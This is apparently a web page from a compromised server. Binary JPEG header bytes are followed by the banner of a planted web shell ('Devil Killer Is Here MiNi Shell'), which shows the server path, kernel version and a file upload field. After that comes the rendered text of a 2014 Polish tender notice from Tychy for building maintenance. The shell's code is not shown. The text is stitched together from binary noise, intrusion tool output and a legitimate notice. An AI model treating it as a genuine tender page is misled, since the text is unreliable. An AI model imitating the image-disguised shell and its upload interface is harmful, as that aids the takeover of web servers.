JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140123/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140123/27354-N-2014.html

<p class="kh_header"><b>Tychy: Utrzymanie techniczne  budynków użyteczności publicznej Balbina Centrum przy ul. Barona 30 oraz Pasaż Kulturalny Andromeda przy Pl. Baczyńskiego 2 , administrowanych przez  MZBM w Tychach w zakresie  bieżącej konserwacji ze świadczeniem czynności pogotowia technicznego</b><br>
<b>Numer ogłoszenia: 27354 - 2014; data zamieszczenia: 23.01.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Zarząd Budynków Mieszkalnych , ul. Filaretów 31, 43-100 Tychy, woj. śląskie, tel. 032 2274091 w. 133, faks 032 2273145.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bip.umtychy.pl/jednostki-organizacyjne-miasta/35</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Gminna Samorządowa Jednostka Organizacyjna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Utrzymanie techniczne  budynków użyteczności publicznej Balbina Centrum przy ul. Barona 30 oraz Pasaż Kulturalny Andromeda przy Pl. Baczyńskiego 2 , administrowanych przez  MZBM w Tychach w zakresie  bieżącej konserwacji ze świadczeniem czynności pogotowia technicznego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest utrzymanie techniczne budynków użyteczności publicznej: 
     Balbina Centrum, przy ul. Barona 30  oraz Pasaż Kulturalny Andromeda przy 
      Pl. Baczyńskiego 2 ,  którymi w imieniu Zamawiającego administruje Miejski Zarząd Budynków Mieszkalnych w Tychach poprzez swoją komórkę organizacyjną, tj.: Rejon Obsługi Mieszkańców II, zwany dalej ROM -em ,a to:        
      -   ROM Nr II  z siedzibą w Tychach przy ul. Budowlanych 41


2.	Zamówienie podzielone jest na 2 (dwie) części zwane dalej zadaniami:

Oznaczenie zadań:   :  
       ZADANIE NR 1  -   Utrzymanie techniczne  budynku użyteczności publicznej
                                      Balbina Centrum przy ul. Barona 30 w Tychach

       ZADANIE NR 2  -    Utrzymanie techniczne  budynku użyteczności publicznej
                                       Pasaż Kulturalny Andromeda przy Pl. Baczyńskiego 2 w Tychach

3.	ZAKRES ZAMÓWIENIA DOTYCZĄCY ZADANIA NR 1 OBEJMUJE: 
1)	 konserwację wewnętrznych instalacji budowlanych: 
       -   instalacji centralnego ogrzewania
       -   instalacji wodno - kanalizacyjnej 
       -   instalacji elektrycznej,
       -   instalacji klimatyzacyjno - wentylacyjnej z instalacją wody lodowej
2)	 konserwację stolarki okiennej, drzwiowej  wewnętrznej i zewnętrznej oraz bramy garażowej: 
3)	 serwis i obsługę systemu multimedialnego
4)	 całodobowe utrzymanie w pełnej sprawności technicznej instalacji p.poż. i systemu 
     oddymiania
5)	 całodobowe utrzymanie w pełnej sprawności technicznej systemu nagłośnienia oraz 
     systemu CCTV
6)	 serwis i obsługę instalacji niskoprądowych (teletechnicznych)
7)	 całodobowe świadczenie czynności pogotowia technicznego
3.1.	Szczegółowy zakres obowiązków na realizację zadania nr 1 zawiera załącznik nr 1 do 
      wzoru umowy.

4.	ZAKRES ZAMÓWIENIA DOTYCZĄCY ZADANIA NR 2 OBEJMUJE: 
1)	konserwację wewnętrznych instalacji budowlanych: 
       -   instalacji centralnego ogrzewania
       -   instalacji wodno - kanalizacyjnej i p.poż.
       -   instalacji elektrycznej,
       -   instalacji klimatyzacyjno - wentylacyjnej z instalacją wody lodowej
       -   instalacji p.poż. i systemu oddymiania
       -   instalacji systemu CCTV

       -   serwis i obsługę instalacji niskoprądowych (teletechnicznych)
      2) całodobowe świadczenie czynności pogotowia technicznego
4.1.	Szczegółowy zakres obowiązków na realizację zadania nr 2 zawiera załącznik nr 1 do 
      wzoru umowy..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających w trybie zamówienia 
     z wolnej ręki, których wartość nie przekroczy 50 % wartości zamówienia podstawowego, na 
     zasadach określonych w art. 67 ust.1. pkt 6) ustawy - PZP</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 50.00.00.00-5, 50.70.00.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Wykonawca przystępujący do przetargu jest zobowiązany wnieść wadium. Wadium należy wnieść na wybrane zadanie (-a) - na czas związania ofertą. Przy wnoszeniu wadium wykonawca winien powołać się na nazwę wybranego zadania. 
2. Wymagane kwoty wadium w podziale na zadania: - ZADANIE Nr 1 -   Utrzymanie techniczne  budynku użyteczności publicznej BALBINA CENTRUM przy ul. Barona 30 w Tychach wadium wynosi:  3 000,00 zł (słownie: trzy tysiące złotych).
- ZADANIE Nr 2 -   Utrzymanie techniczne  budynku użyteczności publicznej  PASAŻ KULTURALNY ANDROMEDA przy Pl. Baczyńskiego 2 w Tychach wadium wynosi: 700,00 zł  (słownie: siedemset złotych). 
3. Wadium musi być wniesione przed upływem terminu składania ofert. 4. Wadium może być wnoszone w jednej lub kilku następujących formach: a) pieniądzu: wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy Zamawiającego: Bank PKO S.A. o / Tychy Nr rachunku bankowego: 71 1020 2528 0000 0202 0267 3846 Wadium wniesione w formie pieniężnej musi znajdować się na koncie Zamawiającego przed upływem terminu składania ofert. b) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym, c) gwarancjach bankowych, d) gwarancjach ubezpieczeniowych, e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dn. 09.11.2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości ( t.j.Dz.U. z 2007 r. Nr 42, poz. 275 z późn. zm.). W przypadku wadium wniesionego w formie innej niż pieniężna - oryginał dowodu wniesienia wadium należy złożyć przed upływem terminu składania ofert w siedzibie Zamawiającego, w Tychach przy ul. Filaretów 31 w Dziale Księgowości (pokój nr 4), natomiast kopię dowodu wniesienia wadium należy załączyć do oferty.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-  Zamawiający nie precyzuje w tym 
   zakresie sposobu oceny spełniania warunku udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia, że  wykonawca spełnia warunek udziału dotyczący posiadania
    wiedzy i doświadczenia (art. 22 ust.1 pkt 2 ustawy - PZP), Zamawiający wymaga złożenia 
    następujących dokumentów: 
  1)  wykazu wykonanych, a przypadku świadczeń okresowych lub ciągłych również  
          wykonanych, głównych usług, w okresie ostatnich trzech lat przed upływem terminu 

         składania ofert, a jeżeli okres prowadzenia działalności jest krótszy -  w tym okresie, 
         wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których 
         usługi zostały wykonane oraz załączeniem dowodów, czy zostały wykonane lub są 
           wykonywane należycie.
   Zamawiający uzna warunek za spełniony jeżeli wykonawca w wykazie usług wykaże: 

1)	dla ZADANIA Nr 1:   
      -   co najmniej jedną usługę zrealizowaną / realizowaną (w ramach jednej umowy) w 
       budynku użyteczności publicznej w zakresie utrzymania technicznego oraz bieżącej 
       konserwacji ze świadczeniem czynności całodobowego pogotowia technicznego  
       o wartości usługi min. 124 500,00  zł (brutto) 
     lub
      -   co najmniej dwie usługi zrealizowane / realizowane (w ramach dwóch odrębnych   
      umów) w budynkach użyteczności publicznej w zakresie utrzymania technicznego 
      oraz bieżącej konserwacji ze świadczeniem czynności całodobowego pogotowia 
        technicznego o wartości min 62 250,00  zł (brutto) - każda z usług


2)	dla ZADANIA Nr 2:   
      -   co najmniej jedną usługę zrealizowaną / realizowaną (w ramach jednej umowy) w 
      budynku użyteczności publicznej w zakresie utrzymania technicznego oraz bieżącej 
      konserwacji ze świadczeniem czynności całodobowego pogotowia technicznego  
       o wartości usługi min. 29 000,00  zł (brutto) 

         Dowodami, o których mowa powyżej są:
a)	 poświadczenie, z tym że  w odniesieniu do nadal wykonywanych usług okresowych lub
     ciągłych poświadczenie powinno być wydane nie wcześniej niż 3 miesiące przed upływem 
     terminu składania ofert

b)	 oświadczenie wykonawcy - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze 
     wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa w pkt a).


          W przypadku, gdy zamawiający jest podmiotem , na rzecz którego usługi wskazane 
          w wykazie zostały wcześniej wykonane, wykonawca nie ma obowiązku przedkładania 
      poświadczeń, o których mowa powyżej.

          Zgodnie z  § 9 ust. 2 rozporządzenia , w postępowaniach o udzielenie zamówienia 
          wszczynanych w okresie 12 miesięcy od dnia wejścia w życie rozporządzenia, wykonawca 
          w miejsce poświadczeń , o których mowa w § 1 ust. 2 pkt 1 może przedkładać dokumenty 
          potwierdzające należyte wykonanie usług , określone w § 1  ust. 1 pkt 3) rozporządzenia 
          Prezesa Rady Ministrów z dnia 30 grudnia 2009 r. w sprawie rodzajów dokumentów, 
          jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą 
          być składane ( Dz. U. Nr 226 poz. 1817)

          Wykaz usług należy sporządzić wg wzoru druku stanowiącego załącznik nr 3 do SIWZ     

         (W przypadku podmiotów występujących wspólnie w/w warunki udziału wykonawcy mogą 
          spełniać łącznie lub co najmniej jeden z wykonawców ).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-  Zamawiający nie precyzuje w tym 
   zakresie sposobu oceny spełniania warunku udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia, że wykonawca spełnia warunek udziału dotyczący dysponowania
          osobami zdolnymi do wykonania zamówienia (art. 22 ust. 1 pkt 3 ustawy - PZP) 
     Zamawiający wymaga złożenia następujących dokumentów:  

1)	    wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia, a w szczególności 
           odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami 
          budowlanymi wraz z informacjami na temat ich kwalifikacji zawodowych , doświadczenia 
          i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych 
          przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami.
           Wymagane jest dysponowanie osobą /osobami zdolnymi do wykonania zamówienia,   
          a w szczególności:
a)	co najmniej jedną osobą posiadającą uprawnienia budowlane w  specjalności instalacyjnej 
       w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, 
       wodociągowych i kanalizacyjnych, uprawniające do  kierowania robotami budowlanymi 
       


   b)   co najmniej jedną osobą posiadającą uprawnienia do zajmowania się eksploatacją
          urządzeń, instalacji i sieci elektroenergetycznych do 1KV na stanowisku dozoru,

c)    co najmniej dwiema osobami , posiadającymi uprawnienia do wykonania pracy 
       na stanowisku eksploatacji urządzeń i instalacji elektroenergetycznych o napięciu do 1 kV 

d)    co najmniej jedną  osobą posiadającą uprawnienia do wykonywania pomiarów ochron
          przeciwporażeniowych i instalacji odgromowych

            Wykaz osób należy sporządzić wg wzoru druku stanowiącego załącznik Nr 4 do SIWZ.

          W przypadku złożenia oferty na dwa zadania wykonawca może wykazać te same 
          osoby.

          (W przypadku podmiotów występujących wspólnie w/w warunki udziału wykonawcy mogą 
           spełniać łącznie lub co najmniej jeden z wykonawców). 
   

2)	oświadczenie , że osoby, które będą uczestniczyć w wykonaniu zamówienia posiadają 
             wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień. 
  
             Oświadczenie należy sporządzić wg wzoru stanowiącego załącznik nr 5 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia , że  wykonawca spełnia warunek udziału dotyczący posiadania
         wymaganej sytuacji ekonomicznej i finansowej  (art. 22 ust. 1 pkt  4 ustawy - PZP), 
         Zamawiający wymaga, złożenia następujących dokumentów: 

    1)  opłaconej polisy, a w przypadku jej braku,  innego dokumentu potwierdzającego, że 
   wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej 
         działalności związanej z przedmiotem zamówienia. 

   Wymagane jest posiadanie ww. dokumentu o wartości ubezpieczenia nie mniejszej niż: 

    a)   120 000,00 zł   -  dla ZADANIA Nr 1
          b)     29 000,00 zł   -  dla ZADANIA Nr 2
         Do oferty należy dołączyć potwierdzenie opłacenia polisy l u b  fakt  jej opłacenia 
         musi wynikać z treści dokumentu.
         Jeżeli fakt opłacenia polisy lub innego dokumentu potwierdzającego, że wykonawca 
         jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności 
         związanej z przedmiotem zamówienia, nie wynika wprost z załączonego do oferty
         dokumentu wykonawca jest zobowiązany dołączyć inny dokument potwierdzający 
         opłacenie składki (np. kopia przelewu składki, potwierdzenie ubezpieczyciela).
    

(W przypadku podmiotów występujących wspólnie powyższe warunki udziału  wykonawcy mogą spełniać  łącznie lub co najmniej jeden z wykonawców ).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Na zawartość oferty składa się: 
1)	wypełniony i podpisany formularz ofertowy - sporządzony według wzoru druku stanowiącego załącznik nr 1 do SIWZ.

2)	wypełniony i podpisany formularz oferty cenowej - sporządzony wg wzoru druku stanowiącego załącznik nr 1a do SIWZ
3)	stosowne pełnomocnictwo (a) do działania w imieniu wykonawcy w przypadku, gdy upoważnienie do podpisania oferty nie wynika bezpośrednio ze złożonego w ofercie odpisu z właściwego rejestru.
4)	w przypadku wykonawców wspólnie ubiegających się się o udzielenie zamówienia, dokument ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego
5)	dowód wniesienia wadium
6)	oświadczenia i dokumenty wymienione w rozdziale V ust. II niniejszej specyfikacji.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.umtychy.pl/jednostki-organizacyjne-miasta/35<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Zarząd Budynków Mieszkalnych w Tychach,
Dział Techniczno-Eksploatacyjny , 43-100 Tychy, ul. Filaretów 31
..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.01.2014 godzina 08:00, miejsce: Miejski Zarząd Budynków Mieszkalnych w Tychach,
SEKRETARIAT -  pokój nr 15,  43-100 Tychy, ul. Filaretów 31.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> ZADANIE NR 1  -   Utrzymanie techniczne  budynku użyteczności publicznej
                                       Balbina Centrum przy ul. Barona 30 w Tychach.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. ZAKRES ZAMÓWIENIA DOTYCZĄCY ZADANIA NR 1 OBEJMUJE: 
1)	 konserwację wewnętrznych instalacji budowlanych: 
       -   instalacji centralnego ogrzewania
       -   instalacji wodno - kanalizacyjnej 
       -   instalacji elektrycznej,
       -   instalacji klimatyzacyjno - wentylacyjnej z instalacją wody lodowej
2)	 konserwację stolarki okiennej, drzwiowej  wewnętrznej i zewnętrznej oraz bramy garażowej: 
3)	 serwis i obsługę systemu multimedialnego
4)	 całodobowe utrzymanie w pełnej sprawności technicznej instalacji p.poż. i systemu 
     oddymiania
5)	 całodobowe utrzymanie w pełnej sprawności technicznej systemu nagłośnienia oraz 
     systemu CCTV
